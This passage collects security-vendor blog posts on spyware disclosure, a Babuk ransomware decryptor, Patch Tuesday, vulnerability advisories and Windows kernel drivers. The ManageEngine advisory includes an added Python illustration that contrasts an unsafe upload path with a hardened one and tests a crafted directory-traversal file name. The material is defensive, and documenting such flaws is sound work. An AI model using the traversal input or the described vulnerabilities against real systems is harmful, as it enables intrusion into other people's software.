However, exposing regimes conducting these operations seems to have little effect on these companies’ abilities to make money. It may increase the costs by making them buy or create new exploit chains, but these vendors appear to have seamlessly acquired new exploit chains, enabling them to remain in business by jumping from one set of exploits to another as a means of initial access. A majority of public disclosures in the commercial spyware space focus on the political aspects of the operations along with listing malicious domains and infrastructure, but fail to tear open the inner workings of the malware themselves. The domains and infrastructure exposed in a disclosure are owned and operated by spyware customers themselves, often in silos, meaning that exposing one operation typically has no impact on all the other customers. However, the risk of exposure will always be based primarily on the effort the customer puts into their anonymization chain.

Such disclosures may have a substantial impact on the regimes (“customer”), but they fail to impose costs on the spyware vendor themselves. What is needed is the public disclosure of technical analyses of the mobile spyware and tangible samples enabling public scrutiny of the malware. Such public disclosures will not only enable greater analyses and drive detection efforts but also impose development costs on vendors to constantly evolve their implants.

Video series discussing the major threat actor trends from 2023

8 January 2024 at 10:30

In this video series, Talos’ Director of Threat Intelligence and Interdiction Matt Olney and Head of Outreach Nick Biasini share their insights on the most significant cybersecurity threats from the past year.

From attacks on network infrastructure to the latest APT activities, as well as an update on our Ukraine Task Force, these short videos provide some great insights into the current cybersecurity threat environment.

You can learn more in the 2023 Talos Year in Review.

The increased targeting of networking devices

Ransomware and extortion

The activities of Advanced Persistent Threat actors (APTs)

Ukraine Task Force update

Recommendations for defenders


New decryptor for Babuk Tortilla ransomware variant released

9 January 2024 at 09:00
  • Cisco Talos obtained executable code capable of decrypting files affected by the Babuk Tortilla ransomware variant, allowing Talos to extract and share the private decryption key used by the threat actor.
  • Cisco Talos shared the key with our peers at Avast for inclusion in the Avast Babuk decryptor released in 2021. The decryptor includes all known private keys, allowing many users to recover their files once encrypted by different Babuk ransomware variants. 
  • Dutch Police, acting on threat intelligence supplied by Talos, identified and apprehended the threat actor behind Babuk Tortilla operations, and the Dutch Prosecution Office prosecuted them, demonstrating the power of cooperation between law enforcement agencies and commercial security organizations such as Talos and Avast.

In cooperation with Dutch Police and Avast, Cisco Talos recovered a decryptor for encrypted files from systems affected by the Babuk ransomware variant known as Tortilla. We first described the operations of Tortilla ransomware in a blog post in November 2021.

Dutch Police used the intelligence provided by Talos to discover and apprehend the actor behind this malware. During the Amsterdam Police operation, Talos obtained and analyzed the decryptor, recovered the decryption key and shared the key with engineers from Avast Threat Labs in charge of development and maintenance of the decryptor for several other Babuk variants. 

The generic Avast Babuk decryptor was already used as the de facto industry-standard Babuk decryptor by many affected users, and it made perfect sense to update it with the keys Talos recovered from the Tortilla decryptor. 

This way, the users can access programs such as NoMoreRansom to download the single decryptor containing all currently known Babuk keys and do not have to choose between competing decryptors for individual variants.

Babuk source code is used as a basis of many ransomware variants

Babuk ransomware emerged in 2021, gaining notoriety for its high-profile attacks on targeted industries, especially those in healthcare, manufacturing, logistics and public services, including critical infrastructure.

Babuk can be compiled for several hardware and software platforms. The compilation is configured through a ransomware builder. Windows and ARM for Linux are the most commonly used versions, but ESX and a 32-bit, older PE executable were also observed over time. 

Babuk ransomware is nefarious by its nature: while it encrypts the victim's machine, it interrupts the system backup process and deletes the volume shadow copies. The source code of the Babuk ransomware was leaked on an underground forum in September 2021 by an alleged insider, opening the door for other cybercriminals to utilize and potentially enhance the ransomware and increase the threat level for businesses and organizations worldwide.

Talos recently analyzed the operations of the RA ransomware group and other groups basing their ransomware on the leaked Babuk source code, documenting 10 different actors using it. 

Figure: Timeline of ransomware families leveraging leaked Babuk ransomware code.

Cisco Talos discovered a Tortilla campaign in our product telemetry on Oct. 12, 2021, targeting vulnerable Microsoft Exchange servers and attempting to exploit the ProxyShell vulnerability to deploy the Babuk ransomware in the victim's environment. 

The actor used a specific infection chain technique where an intermediate unpacking module is hosted on a pastebin.com clone, pastebin.pl. The intermediate unpacking stage was downloaded and decoded in memory before the final payload embedded within the original sample was decrypted and executed.

Babuk Tortilla decryptor is a standard decryptor provided by the threat actor

The Babuk Tortilla decryptor obtained by Cisco Talos was likely created from the leaked Babuk source code and the generator. An actor wishing to utilize the ransomware toolkit has to generate a public/private key pair to be used in the operation. The key pair can also be generated per campaign, but we have no indication of other keys used by the Tortilla actor. Instead, a single key pair is used to attack all their victims. 

The public key is deployed to the ransomware payload where it is used in the infection process to encrypt the per-file symmetric encryption/decryption key. That is then appended to the end of every encrypted file with the encryption marker and additional metadata. This allows the specific decryptor to recognize the fact that a file is encrypted and decrypt the symmetric key using the private key embedded in the body of the specially crafted decryptor tool created by the threat actor. 

Figure: Recursive decryptor function for traversing the file system is not efficient.

The decryption process used by the original decryptor is rather slow due to the inefficiency of the routine used to traverse the file system. Although the decryptor supplied by the threat actor works, Cisco Talos made the decision not to share any executable code created by the threat actor, as it may expose production environments to untrusted code. The approach we took was to extract the private key from the decryptor and add the key to the list of keys supported by the Avast Babuk decryptor.

Generic Babuk decryptor helps users to recover their files

The Avast Babuk decryptor is optimized for performance and allows users to recover their files very quickly if the Babuk variant uses one of the known private decryption keys. The initial decryptor was released in October 2021, and it has been actively supported by Avast Threat Labs’ engineers. 

Its simple user interface allows even users with minimal experience in ransomware recovery to easily understand its usage and purpose.

Figure: Avast Babuk decryptor can be used to decrypt files encrypted by the Babuk Tortilla variant.

Users affected by Tortilla ransomware operations can download the updated version of the Babuk decryptor from the NoMoreRansom decryptors page or the Avast decryptors download page.

Cisco Talos would like to thank the Dutch Police and Avast for their cooperation and we look forward to working with them on other similar projects.

Microsoft starts off new year with relatively light Patch Tuesday, no zero-days

9 January 2024 at 18:58

Microsoft followed up one of the lightest recent Patch Tuesdays in December with another month of no zero-day vulnerabilities and only two critical issues.   

Many of the company’s monthly security updates in 2023 included vulnerabilities that were actively being exploited in the wild or had publicly available exploits already in circulation.   

The company started out 2024 by disclosing 48 vulnerabilities on Tuesday across its suite of products and services, 46 of which are considered of “important” severity. 

One of the critical vulnerabilities patched Tuesday is CVE-2024-20674, a security bypass vulnerability in the Windows Kerberos authentication protocol. An attacker could carry out a man-in-the-middle attack to exploit this vulnerability and spoof the Kerberos authentication server, thereby bypassing the authentication process. 

Because of Kerberos’ presence on several of the most popular operating systems, Microsoft considers this vulnerability “more likely” to be exploited.  

The other critical issue is CVE-2024-20700, which can lead to remote code execution. This vulnerability in Windows Hyper-V can be exploited if an adversary wins a race condition. Also, they must first gain access to a restricted network before an exploit can work. 

There are two other remote code execution vulnerabilities that are worth mentioning, both of which Microsoft considers to be of “important” severity: CVE-2024-21307, which exists in Windows Remote Desktop Client, and CVE-2024-21318, which affects SharePoint Server. 

In the case of CVE-2024-21307, the vulnerability can be triggered if an authenticated user connects to a malicious remote desktop server where the remote desktop host server sends a specially crafted Server RDP Preconnection that targets the remote client's drive redirection virtual channel. This could lead to remote code execution on the victim's machine. 

CVE-2024-21318 is relatively easy for an attacker to exploit, only requiring them to write and inject specific code into SharePoint Server.

The Windows Kernel also contains an elevation of privilege vulnerability, CVE-2024-20698, which could allow an attacker to gain SYSTEM privileges. There is little other information on how an attacker could exploit this vulnerability. 

A complete list of all the other vulnerabilities Microsoft disclosed this month is available on its update page.

In response to these vulnerability disclosures, Talos is releasing a new Snort rule set that detects attempts to exploit some of them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Cisco Security Firewall customers should use the latest update to their ruleset by updating their SRU. Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. 

The rules included in this release that protect against the exploitation of many of these vulnerabilities are 62847 – 62850 and 62854 – 62861. There are also Snort 3 rules 300797 – 300802. 

Critical vulnerability in ManageEngine could lead to file creation, dozens of other vulnerabilities disclosed by Talos to start 2024

17 January 2024 at 17:00

Cisco Talos’ Vulnerability Research team has disclosed dozens of vulnerabilities over the past month, including more than 30 advisories in GTKWave and a critical vulnerability in ManageEngine OpManager. 

Cisco ASIG also recently discovered an information disclosure vulnerability in DuoUniversalKeycloakAuthenticator, an authentication solution for Keycloak, an open-source identity and access management solution.  

There are also multiple vulnerabilities in AVideo, an open-source video broadcasting suite, that could lead to arbitrary code execution. 

All the vulnerabilities mentioned in this blog post have been patched by their respective vendors, all in adherence to Cisco’s third-party vulnerability disclosure policy.

For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website.  

ManageEngine OpManager directory traversal vulnerability 

Discovered by Marcin “Icewall” Noga. 

A directory traversal vulnerability exists in the uploadMib functionality of ManageEngine OpManager, a network management solution. 

TALOS-2023-1851 (CVE-2023-47211) can be exploited if an adversary sends a target a specially crafted HTTP request, which could allow them to create a file in any location outside of the default MIB file directory. This vulnerability has a critical severity score of 9.1 out of 10. 

The vulnerable functionality is reached in OpManager by navigating to Settings -> Tools -> MIB Browser and selecting “Upload MIB.” The arbitrary file an adversary could eventually create is limited to a few file extensions, however, including .txt, .mib and .mi2. 
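As an added illustration (not OpManager’s code and not a reconstruction of the bug itself), the Python below places the unsafe file-name join behind this class of directory traversal beside a hardened version that confines the upload to the MIB directory and enforces the advisory’s .txt/.mib/.mi2 allowlist; the directory layout, function names and sample file names are assumptions.

```python
"""Added example, not ManageEngine's code: confining an uploaded MIB file name.

vulnerable_target_path() shows the unsafe pattern behind upload-handler
directory traversal (a client-supplied name joined onto the upload directory
unchecked).  safe_target_path() shows the checks a hardened handler needs.
All directory and file names here are hypothetical.
"""
import os
from pathlib import Path

# Extension allowlist as stated in the advisory text for this feature.
ALLOWED_EXTENSIONS = {".txt", ".mib", ".mi2"}


def inside_directory(root: str, path: str) -> bool:
    """True if the resolved path lies inside the resolved root directory."""
    root = os.path.realpath(root)
    path = os.path.realpath(path)
    try:
        return os.path.commonpath([root, path]) == root
    except ValueError:  # paths on different drives (Windows)
        return False


def vulnerable_target_path(mib_dir: str, filename: str) -> str:
    """Unsafe: os.path.join drops mib_dir entirely when filename is absolute,
    and '..' components walk the result out of mib_dir."""
    return os.path.join(mib_dir, filename)


def safe_target_path(mib_dir: str, filename: str) -> str:
    """Return an absolute path strictly inside mib_dir, or raise ValueError.

    Checks, in order: no NUL bytes (they truncate names in C-level APIs),
    no path components of any flavour, extension allowlist, and finally a
    confinement check on the *resolved* path so that symlinks and any
    remaining '..' cannot escape the MIB directory.
    """
    if not filename or "\x00" in filename:
        raise ValueError("empty or NUL-containing file name")
    # Normalise Windows separators before taking the final component; if the
    # final component differs from the input, the input carried a path.
    base = os.path.basename(filename.replace("\\", "/"))
    if base in ("", ".", "..") or base != filename:
        raise ValueError(f"path components not allowed: {filename!r}")
    if Path(base).suffix.lower() not in ALLOWED_EXTENSIONS:
        raise ValueError(f"extension not allowed: {base!r}")
    root = os.path.realpath(mib_dir)
    candidate = os.path.realpath(os.path.join(root, base))
    if not inside_directory(root, candidate):
        raise ValueError("resolved path escapes the MIB directory")
    return candidate


def accepts(mib_dir: str, filename: str) -> bool:
    """Convenience wrapper: does the hardened handler accept this name?"""
    try:
        safe_target_path(mib_dir, filename)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    import tempfile
    with tempfile.TemporaryDirectory() as mib_dir:
        crafted = "../../../../tmp/outside.txt"  # constructed traversal name
        unsafe = vulnerable_target_path(mib_dir, crafted)
        print("unsafe join  :", unsafe, "| inside MIB dir?", inside_directory(mib_dir, unsafe))
        print("hardened     :", "accepted" if accepts(mib_dir, crafted) else "rejected")
        print("legitimate   :", safe_target_path(mib_dir, "router.mib"))
```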

Multiple vulnerabilities in GTKWave 

Discovered by Claudio Bozzato. 

Cisco Talos recently discovered multiple vulnerabilities in the GTKwave simulation tool, some of which could allow an attacker to execute arbitrary code on the targeted machine. 

GTKwave is a wave viewer used to run different FPGA simulations. It includes multiple versions to run on macOS, Linux, Unix and Microsoft machines. The open-source software analyzes trace files to look at the results of simulations run across different design implementations, or to analyze protocols captured with logic analyzers.  

Talos researchers found a wide array of security issues across this software that affect different functions in GTKwave, many of which are triggered if an attacker can trick the targeted user into opening a specially crafted malicious file. In all, Talos recently released 33 advisories that cover more than 80 CVEs. Many of these issues are caused by the reuse of vulnerable code across the software. Other vulnerabilities are duplicates of the same flaw, reachable when the adversary supplies a different file type as the initial malicious document. 

There are eight integer overflow vulnerabilities that could result in memory corruption, and eventually, arbitrary code execution: TALOS-2023-1812 (CVE-2023-38618, CVE-2023-38621, CVE-2023-38620, CVE-2023-38619, CVE-2023-38623, CVE-2023-38622), TALOS-2023-1816 (CVE-2023-35004), TALOS-2023-1822 (CVE-2023-35989), TALOS-2023-1798 (CVE-2023-36915, CVE-2023-36916), TALOS-2023-1777 (CVE-2023-32650), TALOS-2023-1824 (CVE-2023-39413, CVE-2023-39414), TALOS-2023-1790 (CVE-2023-35992) and TALOS-2023-1792 (CVE-2023-35128). 

The most common vulnerability type Talos researchers found in GTKWave was out-of-bounds write issues that could lead to arbitrary code execution. All the following vulnerabilities could be exploited if a target opened an attacker-created file: 

TALOS-2023-1807 (CVE-2023-37921, CVE-2023-37923, CVE-2023-37922) can also lead to remote code execution, but in this case, is caused by an arbitrary write issue. 

For a complete list of all the vulnerabilities Talos discovered in GTKWave, refer to our Vulnerability Reports page here. 

DuoUniversalKeycloakAuthenticator for Keycloak 

Discovered by Benjamin Taylor of Cisco ASIG. 

An information disclosure vulnerability exists in the instipod DuoUniversalKeycloakAuthenticator for Keycloak. Keycloak is an open-source identity and access management solution, and DuoUniversalKeycloakAuthenticator allows Keycloak to push a Cisco Duo notification to the Duo app, asking the user to authenticate.  

The Keycloak extension for Duo, after it detects that initial authentication has succeeded with Keycloak, redirects the user’s browser to the configured duosecurity.com endpoint, sending the username and password in question each time. 

TALOS-2023-1907 (CVE-2023-49594) indicates that this is unnecessary exposure of this data, potentially allowing an attacker to steal or view this information. 

Multiple vulnerabilities in WWBN AVideo 

Discovered by Claudio Bozzato. 

WWBN AVideo contains multiple vulnerabilities that an attacker could exploit to carry out a range of malicious actions, including brute-forcing user credentials and forcing a targeted user to reset their password to something the attacker knows. 

AVideo is a web application, mostly written in PHP, that allows users to create audio and video sharing websites. Users can import videos from other sources, like YouTube, encode the videos and then make them shareable in various ways. 

There are multiple cross-site scripting vulnerabilities in AVideo that could allow an attacker to execute arbitrary JavaScript code on the targeted machine: 

An attacker could exploit these vulnerabilities by tricking a user into visiting a specially crafted web page. 

There are three other vulnerabilities — TALOS-2023-1869 (CVE-2023-47171), TALOS-2023-1881 (CVE-2023-49738) and TALOS-2023-1880 (CVE-2023-49864, CVE-2023-49863, CVE-2023-49862) — that could allow adversaries to read arbitrary files with an HTTP request targeting different parameters in AVideo’s “objects/aVideoEncoderReceiveImage.json.php” file. 

Talos researchers also discovered TALOS-2023-1896 (CVE-2023-49589), an insufficient entropy vulnerability that can allow an attacker to forge a password reset for an administrator account. This could allow an adversary to reset a user’s account, set a new password that only the adversary knows, and then log in with that account information. An adversary could also exploit TALOS-2023-1897 (CVE-2023-50172) to prevent AVideo from sending an email to the associated account’s email address alerting them of the password reset process, so exploitation becomes less evident. 

Similarly, TALOS-2023-1900 (CVE-2023-49599) can also be exploited using this method, but this vulnerability targets administrator accounts. 

The most serious vulnerability Talos discovered in AVideo is TALOS-2023-1886 (CVE-2023-47862), a local file inclusion vulnerability that could eventually lead to arbitrary code execution. This vulnerability has a severity score of 9.8 out of 10. TALOS-2023-1885 (CVE-2023-49715) is an unrestricted PHP file upload vulnerability that can also lead to code execution, but only when used in conjunction with a local file inclusion vulnerability like TALOS-2023-1886. 

TALOS-2023-1898 (CVE-2023-49810) could be exploited in AVideo by sending a specially crafted HTTP request. An adversary could exploit this vulnerability to bypass the CAPTCHA process when trying to log into the service, making brute-force or password-guessing attacks against login credentials easier to carry out. 

Exploring malicious Windows drivers (Part 1): Introduction to the kernel and drivers

18 January 2024 at 13:00

Drivers have long been of interest to threat actors, whether they are exploiting vulnerable drivers or creating malicious ones. Malicious drivers are difficult to detect and successfully leveraging one can give an attacker full access to a system. Real-world examples can be found in our previous research into the driver-based browser hijacker RedDriver and HookSignTool — a signature timestamp forging tool.

With the existence of malicious drivers, there is a need for those who can analyze identified samples. This analysis requires specific knowledge of the Windows operating system, which can be difficult to acquire. Windows drivers and the kernel can be overwhelming to learn about, as these topics are vast and highly complex. The documentation available on these subjects is daunting and difficult to navigate for newcomers, even for those with programming experience. This initial hurdle and steep learning curve create a high barrier of entry into the subject. To many, the kernel space seems to be an arcane and hidden part of the operating system. 

This series is a high-level introduction and overview of drivers and the Windows kernel for those who are interested in malicious driver research but do not have experience with them. However, previous experience with basic Windows concepts like processes, threads, the registry and common system files is recommended, along with experience or familiarity with disassemblers and C or C++ programming. In the future it may be advantageous to acquire experience with the Rust programming language, as Microsoft has slowly started to migrate portions of the Windows 11 kernel over to Rust. 

This series intends to serve as a starting point for learning about malicious drivers and to lower the barrier of entry into the subject. Each portion of this series will build on the last, but first, we’ll introduce the basic concepts of drivers and the Windows kernel and the I/O system. 

In the next entry, we’ll expand on the I/O system and driver operations. Eventually, we’ll get to topics like the security concepts surrounding drivers and how they can be used in a malicious context, and basic driver analysis and how to identify a malicious driver.

Links to external resources for further information on relevant subjects will be provided to supplement this blog post. It is highly recommended to explore the links, as this blog series is meant to serve as a broad introduction to concepts rather than detailed instruction. A list of recommended resources for further reading will also be provided.

The Windows kernel

Kernel mode vs. User mode

The Windows operating system (OS) is split into two layers or “modes:” User mode, where the files and applications that users interact with reside, and kernel mode, where kernel-mode drivers and the underpinnings of Windows perform the necessary functions to run the system. Splitting the operating system into two modes creates a highly controlled logical barrier between the average user and the Windows kernel. This barrier is necessary to maintain the integrity and security of the system, as the kernel is a highly complex and fragile environment.


In memory, the two modes are logically separated into two “virtual” address spaces. Within the user-mode address space, applications open a process when executed and run in separate private virtual memory spaces. If a user-mode process crashes, running in private memory spaces allows the system to continue operating and handle the crashed process accordingly. However, in kernel mode, drivers all run in the same virtual address space along with the operating system itself. If a driver mistakenly writes to the address of another driver or the operating system, the entire system crashes to prevent damage, resulting in what is commonly known as the “Blue Screen of Death” (BSOD). In other words, it's easy to crash the system with a driver, so they must be written carefully.

Kernel concepts 

The Windows kernel is an intensely complex subject, warranting entire books and courses dedicated to different aspects of its functionality. It would not be possible to thoroughly describe the kernel in just one blog post. However, we will introduce the basics by discussing drivers and how they interact with the operating system. This will provide a foothold for starting the process of learning about the kernel and drivers in greater detail. 

The kernel-mode layer is composed of an array of different components that work in concert to run the system. As the chart below shows, kernel mode is further divided into different layers.

Important note: The above chart is a simplified representation of the Windows kernel. Many components are not represented here as they are outside the scope of this blog post.

As can be seen above, drivers run in kernel mode rather than in user mode with applications. Kernel mode can be seen as the underlying infrastructure of the OS that is never directly interacted with by a typical user. Although the layers are logically separated, information is still exchanged between the layers through highly controlled channels. 

In modern operating systems, a system's privilege model is typically divided into logical layers commonly represented as “rings.” Each ring represents a level of privilege, with the outermost ring being the least privileged and the center ring — the kernel — being the most privileged. An application in the outer ring cannot directly perform actions that require the privilege of an inner ring. This model is referred to as “hierarchical protection domains” or simply as “protection rings.”


The protection rings model is designed to prevent faults and malicious activity by restricting direct access to system resources. Any actions from an outer ring that require higher privileges must make a “system call” (also known as a syscall). Making a syscall begins a chain of functions that ultimately performs the intended action in the kernel at Ring 0. As an example, if an application were to execute the Windows API function OpenProcess, the flow of execution would look like this in an x64 system:


In Ring 3, each function in the flow of execution is effectively a wrapper for the next function in the chain, each one passing execution to the next. However, once NtOpenProcess in ntdll.dll is called, the next step is making the actual syscall to the kernel which in turn executes KiSystemCall64 — the system service dispatcher.

Once it receives a syscall, KiSystemCall64 retrieves the address of the requested function from the System Service Descriptor Table (SSDT), a table of addresses of kernel functions that have been mapped for use by system calls. Once the appropriate address has been located, the requested function will execute.

Executive layer

Within kernel mode is another layer referred to as the “executive layer,” which contains several components that provide functions and services for drivers:

These are referred to as “managers” and each provides an interface to its various functions for drivers to use. Each manager is responsible for a specific area of functionality, such as object management or memory management. The manager names are fairly self-explanatory, but each will be discussed in this blog series when necessary. To further understand the various managers, we recommend exploring the MSDN links provided in the list above.

A large portion of the behavior observed while analyzing malicious drivers will be related to functions that are provided by the executive layer manager interfaces. Later in this series, we will discuss how the I/O manager plays a large role in the operations of drivers, including malicious ones. 

Hardware abstraction layer (HAL)

Below the kernel sits the hardware abstraction layer (HAL), which can be described as an intermediary layer between the hardware and the rest of the OS. In Windows, the HAL is implemented in the aptly named “hal.dll.” The HAL facilitates communication between the OS and the physical hardware and provides a standard interface to processor resources. An important feature of the HAL is that it allows Windows to operate on different CPU architectures by implementing different versions of the HAL depending on the architecture. 

As opposed to many DLLs, most of the functions exported by hal.dll are not intended to be called directly by a programmer via an application or driver but are intended to be used by other modules and components in the system. Most of the functions hal.dll exports are undocumented and many are obsolete holdovers from previous Windows versions. 

Drivers

What do drivers do?

Drivers serve a critical background role in the Windows operating system, and most users will not directly interact with them past the initial installation or the occasional update. While the file structure may be similar to user-mode executables, they function quite differently. Unlike user-mode executables, drivers do not use the standard Win32 API routines, but rather “driver support routines,” which are provided by a set of kernel mode libraries and the interfaces of the manager components within the executive layer. 

Generally, drivers operate in kernel mode and facilitate communication between the operating system and hardware or connected devices. However, this is an oversimplification as there are many types of drivers and not all interface directly with hardware, such as filter drivers and software drivers. Some drivers operate within user mode, although for this blog series, we will focus on kernel-mode drivers only. For more information on driver types, we recommend referring to the Microsoft documentation.

In simple terms, a driver receives requests from clients and performs different actions in the system that are outside the direct capabilities of the client itself. These actions can include interfacing with hardware, manipulating threads or processes, network filtering and many others that require kernel-level access. In other words, drivers serve as conduits for instructions given to the operating system by bridging the gap between kernel mode and user mode.

Driver files

From a superficial standpoint, a driver is essentially a dynamic link library (DLL) that has the “.sys” file extension, although it differs greatly from typical DLL files. A driver cannot be executed in the same manner as other executable files and the functions and libraries that a driver imports are not available for use in user-mode applications. To run a driver, it must first be loaded into the operating system through a specific process that will be discussed later on in this series.

In many cases, a .sys file will initially be contained within a “driver package” along with a setup information (INF) file, a catalog (.cat) file and any other files the driver might require. An INF (.inf) file is a text file that provides Windows with all the necessary information it needs to install the driver such as version info, device IDs, driver files and .cat files. An example and overview of INF files can be found here in Microsoft's documentation. A catalog file contains the file hashes of the contents of the driver package, which Windows uses to verify the integrity of the files contained within the package.

How do drivers work?

Windows Driver Model and Frameworks

With the release of Windows 98 and Windows 2000, Microsoft released the Windows Driver Model (WDM), a fundamental model for device drivers that, among other features, eased the process of driver development. This new model made it easier to port a driver's source code between different versions of Windows, rather than having to write a separate driver for each version. This portability provided forward compatibility, which was not possible before its release. A WDM driver is not guaranteed to be backward compatible, however, as older versions of Windows may not have the same features available.  

One of the downsides to WDM is that it does not inherently handle Plug and Play (PnP) or Power Management I/O requests, which became increasingly common with hardware. This led most developers to copy boilerplate code that could handle these requests into their drivers, which is a rather inefficient process.

To make writing a driver a more streamlined process, Microsoft introduced the Windows Driver Frameworks (WDF), also formerly known as Windows Driver Foundation. Providing developers with WDF removed the need for boilerplate code that used to be required for each driver. However, WDF itself is not a singular framework. It actually contains two distinct frameworks, KMDF (Kernel-mode Driver Framework) and UMDF (User-mode Driver Framework). WDF does not directly replace WDM, but provides a more efficient interface to WDM that simplifies some of the more complicated tasks.

Although Microsoft recommends using KMDF to develop kernel-mode drivers at the time of this writing, WDM can still be a viable option and is still the core model that Windows drivers are based upon. WDF adds a layer of abstraction to development that takes care of some of the more tedious aspects of writing a driver. However, it is beneficial to learn WDM, as it provides a clearer view of some of the actions that WDF performs behind the scenes. For this reason, the code examples in this blog series will be utilizing WDM. Additionally, it is valuable knowledge from a research and defense perspective, as it is still common for malicious drivers to be written using WDM. It is worth mentioning that in the case of developing production drivers, it is highly recommended to follow Microsoft’s guidance and standard practices. 

Driver code

Generally, Windows drivers are written in C, although with Visual Studio 2012 and Windows Driver Kit (WDK) 8, Microsoft began supporting C++. Some driver developers prefer C++, as it allows for easier resource management by using a concept called Resource Acquisition is Initialization (RAII). While RAII is outside the scope of this blog post, understanding what it is can be useful later on while learning about drivers.

An important difference between writing drivers and user-mode executables is that many of the memory operations for drivers must be done manually. In a user-mode application, any private allocated memory will be freed once the process terminates. Conversely, while writing a driver, memory must be manually allocated and freed accordingly, otherwise, it may result in a memory leak and cause unexpected issues. Special care should be taken to ensure all memory is appropriately handled while developing drivers.

To perform its basic operations, a driver must first implement its required “standard routines.” Without implementing each of these standard routines, a driver could not function:

Objects in Windows

Before diving into how a driver works, it is necessary to first introduce “objects,” one of the key concepts of the Windows kernel. 

The Windows OS is object-based, meaning the files, threads, executables and all the various components within the system are defined and represented as specific object types. 

Conceptually, representing an object as a defined type provides standardization and portability, as the structure of a defined type will always be the same regardless of what is interacting with it. The data held within a structure may change, but the definition of the structure itself cannot be changed, as it would then be a different object type by definition. 

Note: Object-based is not to be confused with object-oriented programming (OOP). While the Windows OS does implement some OOP principles, one term should not be conflated with the other.

As an example, the system represents the image of a loaded driver as an object type called DRIVER_OBJECT, and the different members of the structure represent and contain its corresponding attributes, such as DriverSize and DriverName. 

DRIVER_OBJECT structure (from MSDN).

You will encounter many types of objects while learning about drivers or the kernel, and documentation for many can be found on the MSDN website. MSDN is the most important resource available while learning about the Windows operating system. Additionally, searching for an object type or function name in a search engine can provide helpful information, as there are several undocumented functions and data types. 

DriverEntry

The most immediate requirement for a driver’s code is that it must have an entry routine, typically named DriverEntry, which is the first routine called once a driver is loaded. There are multiple required responsibilities that DriverEntry must take care of: 

  • Implementing the other standard routines.
  • Implementing dispatch routines and assigning their entry points.
  • Creating and initializing required resources, objects and devices.
  • Freeing memory that is no longer required.
  • Providing an NTSTATUS return value.   

DriverEntry takes two parameters: DriverObject and RegistryPath. 

DriverEntry prototype (from MSDN).

The RegistryPath parameter is a pointer to a Unicode string that contains the registry path to the driver's “parameters” key in the registry, which is created when the driver is initially installed on the system. The key typically contains configuration information that the driver might require, depending on how the driver was written. 

The DriverObject parameter is a pointer to a structure defined as DRIVER_OBJECT, which represents the kernel-mode driver itself and contains information about the driver within its members. DRIVER_OBJECT is partially opaque, meaning that not all of its members are viewable to the user.  

The example below shows what a typical DriverEntry function might look like written in C++:


In this example, DriverEntry simply returns an NTSTATUS value of STATUS_SUCCESS once it has finished executing.

As mentioned earlier, DriverEntry must also create and initialize the required resources, objects, or devices that the driver needs. For demonstration purposes, this driver needs to initialize and create a device object and a symbolic link.

For a driver to receive requests from a client it must create a device object, which is represented as the structure DEVICE_OBJECT. 

“The DEVICE_OBJECT structure is used by the operating system to represent a device object. A device object represents a logical, virtual, or physical device for which a driver handles I/O requests.” - MSDN 

A device object can be thought of as an interface for requests between a client and a driver. Instead of sending a request directly to a driver, a device object acts as the communication point for a client. Creating a device object is done by declaring a PDEVICE_OBJECT pointer and passing it to the IoCreateDevice function as the DeviceObject parameter. A name for the device, represented as a Unicode string, is also supplied as the DeviceName parameter. 

IoCreateDevice prototype (from MSDN).

Now, a symbolic link can be initialized and created using the device object name by calling the IoCreateSymbolicLink function. A symbolic link — or symlink — links the device object name to a specified name that will be visible to users. 

Creating a device object and symbolic link.

After setting up the device object and symlink, the driver is now ready to implement its dispatch routines — the functions that process the different requests that a driver might receive.  

Unload routine

Another required section of code is a DriverUnload routine, a function that determines what operations will be performed once a driver is unloaded. This will commonly include deleting device objects and symbolic links created by the driver or performing any cleanup that may be necessary. 

In DriverEntry, the unload routine is registered by assigning it to the DriverUnload member of the DriverObject structure. In this example, the device object and symlink will be deleted.


Dispatch routines and function codes

An important member of the DRIVER_OBJECT structure to understand is MajorFunction. This member is defined as an array of PDRIVER_DISPATCH – a pointer to a DRIVER_DISPATCH routine – and contains the entry points for a driver's dispatch routines; effectively a list of operations that a given driver supports. Dispatch routines are functions within a driver that are called when it receives a system-defined “function code,” also known as a “MajorFunction code.” As can be seen in the list below, each one has the prefix “IRP_MJ_”:

Common MajorFunction codes:

It is worth noting that while the majority of function codes start with “IRP_MJ_”, there are some that use the prefix “IRP_MN_” which indicates that it is a MinorFunction, a subordinate of a related MajorFunction. As an example, IRP_MN_SET_POWER is a subordinate of IRP_MJ_POWER. A more complete list of Major- and MinorFunction codes can be found here in the Microsoft documentation.

Function codes essentially serve as instructions for a driver to perform certain actions by request. To be able to handle function codes, a driver must assign a dispatch routine entry point to the appropriate MajorFunction code within the DriverObject structure. This assignment takes place in the DriverEntry routine, and as can be seen below, each dispatch routine is assigned to a specific function code:


For example, if the driver in the example above receives a request that contains the function code IRP_MJ_CREATE, it would then execute the dispatch routine TestDriverCreate. Below is an example of what the TestDriverCreate routine could look like:


IRP_MJ_CREATE is an important function code as it must be handled by every driver, whether it makes use of it or not. In the TestDriverCreate function shown above, the function code is handled by doing nothing at all and then completing the request by calling IoCompleteRequest. A more detailed explanation for handling requests will appear later in this blog series. For demonstration purposes this example intentionally has no functionality; however, in a real driver there might be actions performed when handling this function code. 

The second parameter of the TestDriverCreate function, “PIRP Irp”, refers to a critical structure used in the operation of drivers: the I/O request packet, also known as an “IRP”.

The I/O system and I/O request packets (IRPs)

To manage the flow of requests to drivers, among other operations, Windows implements what is called the I/O (input/output) system. This system is responsible for facilitating the flow of data between drivers, peripheral devices and any client making a request to a driver. The data — including major function codes — is encapsulated in what is called an “IRP,” short for “I/O request packet,” represented as a structure defined as _IRP.

_IRP structure (from MSDN).

As part of the I/O system, the I/O manager serves as an interface to kernel-mode drivers by creating and sending IRPs to drivers, which can contain a function code for the receiving driver to act upon. However, the I/O manager is not the only source of IRPs, as they can be created by other managers in the Executive layer, and in some cases, they may be created by a driver. Creating IRPs is not the only function of the I/O manager. It is also responsible for creating a driver object for each installed driver.

As mentioned earlier, the I/O system plays a large role in the operations of drivers, and it is worth becoming familiar with its components. In our next entry in this series, we will expand on the topic of IRPs and the I/O system and their relation to drivers. Device stacks and IOCTLs will also be introduced. Later in the series, we will also walk through the process of loading and debugging a driver, eventually leading to malicious driver behavior and analysis. 

